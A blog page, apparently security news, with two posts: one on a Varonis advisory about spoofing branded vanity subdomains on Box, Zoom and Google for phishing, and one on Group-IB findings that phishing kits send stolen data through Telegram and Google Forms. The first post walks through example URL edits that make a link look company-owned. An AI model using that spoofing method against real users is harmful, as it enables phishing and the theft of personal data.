Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Google Forms. Show all posts

SaaS App Vanity URLs Can Be Spoofed for Phishing & Social Engineering

 

Researchers warn that vanity links made by businesses to add their brand to well-known cloud services could become a handy vector for phishing attacks and a technique to deceive users. Cloud services that don't check whether subdomains have been modified may allow URLs that appear to be from "varonis.box.com" or "apple.zoom.us," according to a Varonis advisory released on Wednesday. 

In the instance of Box.com, this could result in a malicious document; in the case of Zoom, it could result in a data-gathering webinar unrelated to the stated brand. The issue arises when a cloud service permits the usage of a vanity subdomain but does not validate it or use it to provide services. More than six months ago, Varonis warned Box.com and Zoom of the problem, as well as Google, whose URLs to Google Docs might be spoofed. 

The issues are essentially fixed, according to the company. According to Or Emanuel, director of research and security at Varonis, the vulnerability is likely to occur for other providers. "We think it is more than just those three SaaS services," he says, adding that attackers can also use the predictability of the subdomains to select potential victims. "Because of the vanity URLs, it makes it very easy for threat actors to scan all the subdomains of all the big Fortune companies with different cloud providers." 

Attackers use well-known companies to hide dangerous code and phishing sites, which allows them to dupe victims into trusting false e-mail messages and website links. In 2019, for example, three-quarters of businesses learned that the lookalike domain had been created by a third party using a top-level domain other than.COM. Varonis' research takes a different approach to the problem. 

Rather than looking at top-level domains, the company's researchers looked into ways to abuse the subdomains that many cloud service providers allow their customers to use. "Not only do vanity URLs feel more professional, but they also provide a sense of security for end-users," Varonis stated in the advisory. "Most people are likelier to trust a link at varonis.box.com than a generic app.box.com link. However, if someone can spoof that subdomain, then trusting the vanity URL can backfire."

When a customer is permitted to utilise their brand as a subdomain, such as varonis.zoom.us, a software-as-a-service (SaaS) application is vulnerable to the attack since the subdomain is no longer validated when the link is provided to a third party, such as participants in a conference call or webinar. In the case of Zoom's service, attackers may design a webinar that asks registrants a series of social engineering-friendly questions, rebrand the webinar as a well-known organisation, and then modify the resulting URL to the targeted URL. 

The original domain — for example, attacker.zoom.us — might be changed to varonis.zoom.us without affecting the link's functioning. A well-branded page might trick a victim into providing personal information, especially if the subdomain indicates that the host is a well-known organisation. In the case of Box.com, a link like app.box.com/f/abcd1234 may be modified to varonis.app.box.com/f/abcd1234 to make it look like an official form gathering information while actually sending it to the attacker.  

"The more interesting attacks from a data protection standpoint are when you have forms for registration or file-sharing requests," Emanuel says. "When the threat actor controls these pages, they can ask for any information they want, and it seems totally legit. It's really hard to determine that it's not a page that the company owns." 

This type of social engineering is beneficial in phishing assaults, as well as persuading people to click on links or download suspicious files. According to the FBI's annual Internet Crime Complaint Center (IC3) report, losses from cybercrime, including phishing attacks, reached approximately $7 billion in 2021. According to Emanuel, cloud providers should verify that any URL change is confirmed by the link's encoding. 

According to Varonis, both Box.com and Google have fixed the issues, albeit the errors still present for Google Forms and Google Docs when using the "Publish to the web" function. When the subdomain is changed, Zoom will notify users. Furthermore, users should be wary of links, particularly if the connected page requires too much information or leads to further links or files. 

"We recommend educating your coworkers about the risk associated with clicking on such links and especially submitting PII and other sensitive information via forms, even if they appear to be hosted by your company’s sanctioned SaaS accounts," Varonis stated in the advisory.

Threat Actors are Using Telegram & Google Forms to Obtain Stolen User Data

 

Security researchers have noted an increase in the misuse of legitimate services such as Google Forms and Telegram for gathering user data stolen on phishing websites. Emails remain the popular method among threat actors to exfiltrate stolen data but these methods foreshadow a new trend in the evolution of phishing kits.

After analyzing the phishing kits over the past year, researchers at cybersecurity company Group-IB observed that more of these tools permit collecting users' stolen data using Google Forms and Telegram. 

What is a phishing kit? 

A phishing kit is a toolset that helps design and run phishing web pages mimicking a particular brand or firm or even several at once. Phishing kits are often sold to those hackers who do not have exceptional coding skills. These phishing kits allow them to design an infrastructure for large-scale phishing campaigns.

By extracting the phishing kit, security researchers can examine the methodology used to carry out the phishing attack and figure out where the stolen data is sent. Besides, a thorough examination of the phishing kit helps researchers in detecting digital footprints that might lead to the developers of the phishing kit.

Latest trends of 2020 

Security researchers at Group-IB identified more than 260 unique brands which were on the target list of cybercriminals, most of them being for online services (30.7% - online tools to view documents, online shopping, streaming service, and more,) email customers (22.8%), and financial organizations (20%). The most exploited brands of 2020 were Microsoft, PayPal, Google, and Yahoo.

Another trend the researchers noticed was that the developers of phishing kits were double-dipping to increase their profits by adding code that copies the stream of stolen data to their network data host. Security researchers explained that one method is by configuring the ‘send’ function to deliver the information to the email provided by the buyer of the phishing kit as well as the ‘token’ variable linked with a concealed email address.

“Phishing kits have changed the rules of the game in this segment of the fight against cybercrime. In the past, cybercriminals stopped their campaigns after the fraudulent resources had been blocked and quickly switched to other brands. Today, they automate their attacks and instantly replace the blocking phishing websites with new web pages,” Yaroslav Kargalev, Deputy Head at CIRT-GIB, stated.